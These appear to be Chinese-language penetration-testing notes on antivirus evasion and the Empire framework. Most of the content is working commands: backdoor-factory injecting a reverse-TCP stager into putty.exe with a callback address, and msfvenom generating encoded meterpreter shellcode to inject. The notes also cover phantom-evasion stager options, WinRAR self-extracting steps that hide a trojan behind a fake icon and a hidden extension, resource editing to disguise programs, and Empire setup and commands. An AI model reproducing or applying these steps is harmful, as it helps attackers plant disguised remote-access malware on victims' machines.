免杀收尾和empire

免杀技术

the-backdoor-factory:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
常用:
-c:code cave(代码裂缝)
-l:代码裂缝⼤⼩
-s:选择使⽤ payload 类型
-H:选择回连服务器地址
-P:回连服务器端⼝
-J:使⽤多代码裂缝

基操:
1. ./backdoor.py -f putty-32bit.exe -S    检测是否可以插入shellcode
2. ./backdoor.py -f putty-32bit.exe -c -l 500  探测代码裂缝
3. ./backdoor.py -f /root/putty.exe -s show  列出payload
4. ./backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 10.211.55.2 -P 3333 -J -o payload.exe  生成木马

自定义shellcode注入:
生成shellcode 
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.135 lport=4444 -e x86/shikata_ga_nai -i 15 -f raw -o shellcode.c
注入shellcode
./backdoor.py -f putty-32bit.exe -s user_supplied_shellcode_threaded -U shellcode.c -H 192.168.1.135 -P 4444 -o pyload.exe

phantom-evasion:

如果出现PKCS12TYPE错误,修改setup/Phantom_lib.py 中PKCS12TYPE,把TYPE去掉

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[+] MODULE DESCRIPTION:

  Pure C reverse tcpstager 
  compatible with metasploit and cobaltstrike beacon
  [>] Local process stage execution type:
   > Thread    线程的方式                      
   > APC                             

  [>] Local Memory allocation type(内存分配的类型):

   > Virtual_RWX    可读可写可执行                 
   > Virtual_RW/RX  可读可写/可读可执行                 
   > Virtual_RW/RWX 可读可写/可读可写可执行              
   > Heap_RWX       可读可写可执行                  

  [>] AUTOCOMPILE format: exe,dll         自动编译后可生成的格式
  Junkcode: 花指令

自解压

SFX: 把压缩包生成为exe可执行程序, 执行后会自动解压

用到的工具: winrar 或者有自解压选项的压缩工具

1
2
3
4
5
6
7
8
9
10
工具:
– winrar、ico图标、木马
§ 步骤:
– 1.右键添加压缩文件
– 2.创建自解压文件栏✔(SFX) – 3.点击高级-->点击自解压选项
– 4.点击更新-->覆盖所有文件夹
– 5.点击设置-->加入图标路径、木马路径
– 6.点击文本和图表-->添加ico图标
– 7.点击模式-->全部隐藏
– 8.确定,然后隐藏文件拓展名

数字签名

资源修改: resource hacker –> 修改资源, 图标,版本信息, 程序内容等…

empire

安装: 

1
2
3
4
5
6
7
8
9
10
11
12
kali:
sudo apt install powershell-empire
sudo powershell-empire

github克隆:
git clone --recursive https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
sudo poetry install
sudo poetry run python empire

在python的框架中碰到 --> requirements.txt ,优先安装这个 pip install -r requirements.txt

314 modules currently loaded —> empire模块

0 listeners currently active —> 存活的监听器

0 agents currently active —> 存活的用户情况

在empire中, 第一件事就是生成监听器
指令:
help 帮助命令
agents 查看用户,进入用户菜单
creds 存放用户的凭据信息
interact 进入到交互模式
list 列出存活的用户或者监听器
active listener 与存活的监听器进行交互
load 加载非标准的模块目录
searchmodule 搜索模块
set 设置参数
show 显示参数
uselistener 使用监听器(创建)
usemodule 使用模块
usestager 使用stager